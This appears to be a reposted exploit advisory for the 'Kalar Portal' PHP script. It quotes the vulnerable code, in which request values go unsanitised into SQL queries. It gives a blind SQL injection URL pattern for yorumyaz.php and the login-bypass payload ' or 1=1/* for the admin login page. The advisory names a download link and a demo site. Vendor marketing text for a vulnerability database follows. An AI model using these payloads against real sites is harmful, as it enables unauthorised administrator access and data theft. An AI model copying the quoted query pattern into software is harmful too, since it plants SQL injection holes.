======================================================
Kalar Portal (id) Blindies SQL Injection Vulnerability
======================================================
########################################################
Author : KnocKout
Special Thankz: DaiMon, Barcod3.
Contact : [email protected]
##########################################################
Script : Kalar Portal
Download : http://www.fifadelisi.net/downloaddetay-60-Kalar_Portal_Script.html
Demo : http://kalar.ufukali.com
##########################################################
Vulnerable file in yorumyaz.php
################## Error Line ##################
<?php
$yorumla=$_POST['yorumla'];
if(empty($yorumla))
{
include"baglan.php";
$sorguy=mysql_query("select * from yorumlar where idsi='$id' and kategori='$bolumdb' and onay=1 order by id");
$yorumsayi=mysql_num_rows($sorguy);
print"<table align='center' width='100%'><tr><td height='35' width='100' class='koyusiyah'><b>$yorumsayi yorum :</b></td><td><a href='#yrm'><b>Sen de yaz</b></a></td></tr>";
if($yorumsayi>0)
###################################################
Inject to Blind SQL
http://target.com/path/yorumyaz.php?id=[Blind]
##################################################
Vulnerable File in admin/giris.php
###################################################
################### Error Line'z ####################
$sorgu=mysql_query("select * from yonetim where isim='$isim' and sifre='$sifre'");
###################################################
Inject to giris.php
Exploitiez
id : ' or 1=1/*
pw : ' or 1=1/*
########################################################
# 0day.today [2018-04-09] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation